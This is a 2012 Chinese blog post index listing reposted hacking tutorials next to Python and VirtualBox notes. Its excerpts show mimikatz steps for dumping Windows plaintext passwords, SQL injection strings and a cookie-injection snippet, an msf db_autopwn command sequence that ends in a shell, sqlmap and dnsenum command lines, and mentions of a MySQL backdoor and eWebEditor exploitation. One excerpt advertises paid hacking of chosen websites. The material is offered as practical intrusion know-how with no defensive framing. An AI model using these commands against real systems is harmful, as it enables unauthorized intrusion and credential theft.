- 博客(41)
- 资源 (5)
- 收藏
- 关注
RSS订阅转载 获取Windows系统明文密码神器
今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:注:使用前需确定自身系统是x86还是x64本人测试环境:windows 2003密码长度:8位进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,1、mimikatz # privilege::debug2、mimikatz # inject:
2012-02-29 20:04:15
2192
转载 mysql报错注入
mysql报错注入大家好 我是~ 式 QQ:40497992本人承接任何网站安全检测 指定拿站 网站开发 软件开发 seo 收学员 等其业务没保存 算了 就是这种 无乱是and 1=1 1=2都是返回正常页面的盲猪也是没戏的 字段19网上貌似有介绍都这个注入代码的 但是很多测试都没成功嘎嘎 这些百度都有
2012-02-29 14:34:42
1188
转载 用Burp_suite快速处理上传截断
BlAck.Eagle Burp suite 是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该读下以前的黑客X档案补习下了。由于该工具是通过Java写的,所以需要安装 JDK,关于 JDK 的安装,笔者简单介绍 下。基本是傻瓜化安装,安装完成后需要简单配
2012-02-29 14:15:56
1660
转载 暗月的cookies手工注入
http://127.0.0.1/shownews.asp?id=189 注入点通用防注入程序 现在我们 cookies突破一下判断知否有注入javascript:alert(document.cookie="id="+escape("189 and 1=1"))这里的“id=”便是hownews.asp?id=189中的id,escape("189")”中
2012-02-29 11:33:23
1764
转载 手工注入详解
现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷!正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己想要的信息,是[被屏蔽的
2012-02-28 17:26:09
1661
1
转载 落泪红尘渗透笔记
落泪红尘渗透笔记2012-02-27 14:24首先把,主站入手注册一个账号,看下上传点,等等之类的。用google找下注入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名。扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis
2012-02-28 10:59:36
1635
转载 半小时精通正则表达式
跟我学正则表达式!想必很多人都对正则表达式都头疼.今天,我以我的认识,加上网上一些文章,希望用常人都可以理解的表达方式.来和大家分享学习经验.开篇,还是得说说 ^ 和 $ 他们是分别用来匹配字符串的开始和结束,以下分别举例说明“^The”: 开头一定要有”The”字符串;“of despair$”: 结尾一定要有”of despair” 的字符串;那么,
2012-02-27 11:34:47
783
转载 Python正则表达式
Python正则表达式版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://python365.blogbus.com/logs/60722288.html也许最重要的元字符是反斜杠"\"。 做为 Python 中的字符串字母,反斜杠后面可以加不同的字符以表示不同特殊意义。它也可以用于取消所有的元字符,这样你就可以在模式中匹配它们了。举个
2012-02-25 23:04:09
623
转载 使用 Python 进行线程编程
引言对于 Python 来说,并不缺少并发选项,其标准库中包括了对线程、进程和异步 I/O 的支持。在许多情况下,通过创建诸如异步、线程和子进程之类的高层模块,Python 简化了各种并发方法的使用。除了标准库之外,还有一些第三方的解决方案,例如 Twisted、Stackless 和进程模块。本文重点关注于使用 Python 的线程,并使用了一些实际的示例进行说明。虽然有许多很好的联机资
2012-02-22 16:04:38
771
转载 python 用urllib2抓取网页和发布(登录或发布文章)的基本操作
python 用urllib2抓取网页和发布(登录或发布文章)的基本操作1.最基本的抓取网页import urllib2content = urllib2.urlopen(‘http://XXXX’).read()..2.使用代理服务器这在某些情况下比较有用,比如IP被封了,或者比如IP访问的次数受到限制等等。import urllib2proxy_
2012-02-21 13:02:46
1252
转载 Python多线程编程
Python线程编程(一)线程对象我们在做软件开发的时候很多要用到多线程技术。例如如果做一个下载软件象flashget就要用到、象在线视频工具realplayer也要用到因为要同时下载media stream还要播放。其实例子是很多的。线程相对进程来说是“轻量级”的,操作系统用较少的资源创建和管理线程。程序中的线程在相同的内存空间中执行,并共享许多相同的资源。在
2012-02-21 11:49:38
646
原创 access基本手工注入
判断1=1,1=21>2,1判断数据库类型and (select count (*) from msysobjects)>0 异常accessand (select count (*) from sysobjects)>0 mssql正常猜表名and 0猜列名and 0猜字段长度and (sele
2012-02-20 18:50:51
734
转载 python 多线程应用
python可以方便地支持多线程。可以快速创建线程、互斥锁、信号量等等元素,支持线程读写同步互斥。美中不足的是,python的运行在python 虚拟机上,创建的多线程可能是虚拟的线程,需要由python虚拟机来轮询调度,这大大降低了python多线程的可用性。我们经今天用了经典的生产者和消费者的问题来说明下python的多线程的运用 上代码:#encoding=utf-8impo
2012-02-19 19:05:52
714
原创 msf自动攻击命令
msf>db_driver sqlite3db_connectload db_trackerdb_nmap -T Aggtessive -sV -n -O -v 192.168.0.7db_servicesdb_autopwn -hdb_autopwn -p -t -esessions -i 1getuidshell
2012-02-19 19:01:07
1639
转载 Python多线程学习
Python多线程学习一、Python中的线程使用: Python中使用线程有两种方式:函数或者用类来包装线程对象。1、 函数式:调用thread模块中的start_new_thread()函数来产生新线程。如下例: view plaincopy to clipboardprint?import time import thread
2012-02-19 19:00:04
693
转载 ubuntu 系统解决mysql连接问题(ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password:
我的系统是ubuntu8.04,最近新装好的mysql在进入mysql工具时,总是有错误提示:# mysql -uroot -pEnter password:ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)使用网上介绍的方法修改root用户的密码:# mysq
2012-02-17 14:54:14
1021
转载 教你编写远程溢出EXPLOIT
译者注:想必很多朋友都对缓冲区溢出非常了解了,网上也有很多关于windows下的缓冲区溢出漏洞的利用教程(本人也写过几篇)。但是linux下的完整溢出教程我还未看到过(也许是本人眼拙吧)。今天在国外的一个论坛发现这篇文章,感觉此文是一个非常不错的基础教程,因此决定翻译出来供大家鉴赏,自己也算是锻炼一下英语翻译吧:-)(其实我是在看完整篇文章后,根据自己的理解写的,几乎一点翻译都没有) 译文
2012-02-15 18:54:52
889
转载 hydra 暴力破解工具
xiaoc[www.81sec.com][0x00]工具简介 hydra著名黑客组织thc的一款开源的暴力破解工具,可以破解多种密码。 其官网http://www.thc.org,本文测试版本为最新版本5.8,可支持引用 TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL,
2012-02-15 14:18:55
1624
转载 Unix目录结构的来历
Unix(包含Linux)的初学者,常常会很困惑,不明白目录结构的含义何在。举例来说,根目录下面有一个子目录/bin,用于存放二进制程序。但是,/usr子目录下面还有/usr/bin,以及/usr/local/bin,也用于存放二进制程序;某些系统甚至还有/opt/bin。它们有何区别?长久以来,我也感到很费解,不明白为什么这样设计。像大多数人一样,我只是根据《Unix文件系统结构
2012-02-15 11:58:00
554
转载 sqlmap注入Access实例
FROM:暗组 最近学习SQL注入攻击,首先从Access+ASP开始,以前没有发现Linux下有什么针对Access的注入工具,后来才知道原来SQLMap可以什么是SQL注入攻击?SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相
2012-02-14 11:38:07
6422
转载 BT5 工具集合
信息搜集工具////////////////////////////////////////////////////////////////////////#dns信息搜集工具./dnsenum.pl -f dns.txt -dnsserver 221.7.1.21 xj169.com -o output.txt./dnsmap sina.com.cn -w wordlist_
2012-02-13 19:22:32
2895
转载 sqlmap常用语句
获取数据库名./sqlmap.py -u "http://www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET
2012-02-13 18:48:34
1266
转载 virtualbox 网络 ip互访+主客机上网设置
virtualbox 是sun公司的虚拟机软件,使用简单,安装方便,广泛用于系统测试和开发部署虚拟环境,相比于功能强大的vmware 最大的特点是开源免费。废话不多说,下面开始。virtualbox的网络连接分为三种NAT:访问互联网 不能访问主机Host Interface:与第一个相反,访问主机,不能访问互联网Intelnal Network:利用主机上
2012-02-13 16:51:49
953
转载 VirtualBox 共享文件夹设置(windows7主机,linux客户机)
设置VirtualBox共享文件夹之前需要安装VirtualBox Guest Additions. 共享文件夹就是使主机的wendows和客户机linux能彼此共享文件。在当前的架构情况下,需要在主机即windows上设一个目录来做共享目录,我是把D盘的sharedfolder目录做为共享目录其路径为D:\winshare。下面就介绍具体如何设置共享文件夹。参考VirtualBox
2012-02-13 10:14:51
886
转载 Xpath SQL Injection
http://www.4shell.org/So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I'd thought I'd make a quick tutorial for it.
2012-02-11 00:47:30
904
转载 Discuz!7.0数据库表结构
1. cdb_access 用户访问权限表 2. cdb_activities 活动数据表 3. cdb_activityapplies 活动申请表 4. cdb_adminactions 关联用户组表 5. cdb_admincustom 后台操作记录表 6. cdb_admingroups 管理组数据表 7. cdb_adminnotes 后台留言表 8. cdb_
2012-02-10 16:46:40
1679
转载 sqlmap注入语句整理
获取数据库名./sqlmap.py -u "http://www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648;
2012-02-10 16:26:14
1775
转载 SQLMAP 注射工具用法2
2.19 数据库用户 命令行选择: --users它是可能列举数据库管理系统用户名单:$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --usersdatabase management system users [5]:[*] 'debian-sys-maint'@'localhost'[
2012-02-10 16:24:55
1592
转载 SQLMAP 注射工具用法
1 。 介绍1.1 要求1.2 网应用情节1.3 SQL 射入技术1.4 特点1.5 下载和更新sqlmap1.6 执照2 。 用法2.1 帮助2.2 目标URL 2.3 目标URL 和verbosity2.4 URL 参量2.5 Google dork2.6 HTTP 方法: 得到或张贴2.7 张贴的数据串2.8 HTTP 曲奇饼倒
2012-02-10 16:10:31
1334
转载 详解强大的SQL注入工具——SQLMAP
详解强大的SQL注入工具——SQLMAP Akast [N.S.T] 1. 前言 Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。 就如
2012-02-10 14:56:03
3717
转载 搜索型注入的文章
帖几个baidu出来的关于搜索型注入的文章。百度货,不知道作者是哪个,感谢了先。。 ^_^简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=
2012-02-10 12:23:37
734
转载 mysql后门
Backdoors for Mysql by Vicente Díaz ([email protected])This document explores the possibility of creating backdoors for the last version of Mysql (5.1) using thesame techniques present i
2012-02-07 18:22:50
742
转载 SRC GetPath用户文档(第一版)
SRC GetPath用户文档(第一版) 第一部分:命令行 Path(目录检索命令):-t 扫描所使用的线程数。-sgdic 使用自生成的社会工程学字典。-reco 开启自动重试。-f 使用特定字典,若不使用此参数则默认使用dics目录下的webaddr.dic字典-p 连接目标主机的端口号,也可以在主机域上使用“www.t00ls.net:80”来完成设置,模
2012-02-06 17:23:33
638
转载 ewebeditor漏洞利用总结
碰到EWEBEDITOR的比较多,找了些资料,以后方便利用先来说说第一个:成功登录后台,发现后台很简陋,只有EWEBEDITOR可以利用,但是登陆后台被删除了(admin_login.asp)。这时我们可以尝试访问 Admin_Style.asp ,看看他能否正常访问,如果能的话,就可以上传shell了。第二种方法跟第一种有类似之处。也是登陆页面被“前人”删掉了,或者密
2012-02-06 15:02:18
1461
转载 python学习系列之OS模块介绍
今天我们来介绍的是python的一个非常强大的模块---OS,我们来示例的时候不是用的标准的python,而是用的python的同胞兄弟Ipython,ipython 是一个 python 的交互式 shell,比默认的 python shell 好用得多,支持变量自动补全,自动缩近,支持 bash shell 命令,内置了许多很有用的功能和函数。 Ipython是需要单独安装的
2012-02-03 19:25:18
847
转载 利用python获得时间
在python下面有个time模块,功能十分强大,今天给大家介绍下这个模块的简单功能:import timeprint time.time()print time.localtime(time.time())print time.strftime('%Y-%m-%d', time.localtime())print time.strftime('
2012-02-03 19:06:39
686
原创 python笔记
ftp导入模块: from frplib import FTP登录:ftp=FTP(target ftp server)ftp.login(user,passwd)dir(ftp)ftp.pwd()ftp.nlst()ftp.cwd('hornet.py')ftp.mkd('vvip')cwd,pwd,rmd,rename,delete===
2012-02-03 18:01:48
888
转载 国外免费公共DNS解析服务器
使用国外免费DNS解析服务除了去掉了运营商的各种广告,还有个最大的好处就是不会重定或者过滤用户所访问的地址,这样就防止了很多网站被电信、网通劫持,网友应该养成不使用默认DNS的习惯。 下面是启光博客整理的一样比较知名的国外网站提供的免费公共DNS服务器。Google DNS: 8.8.8.8 8.8.4.4OpenDNS: 208.67
2012-02-03 16:10:09
1104
转载 Hacking python系列教程
1. python basics] python基础 (上)=======================================================================在线观看:http://www.cnhhu.com/v/cnhhul00085/index.html===========================================
2012-02-03 15:53:40
1302
windows管理工具
2011-11-22
网站挂马扫描器(MScaner)
2011-11-22
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人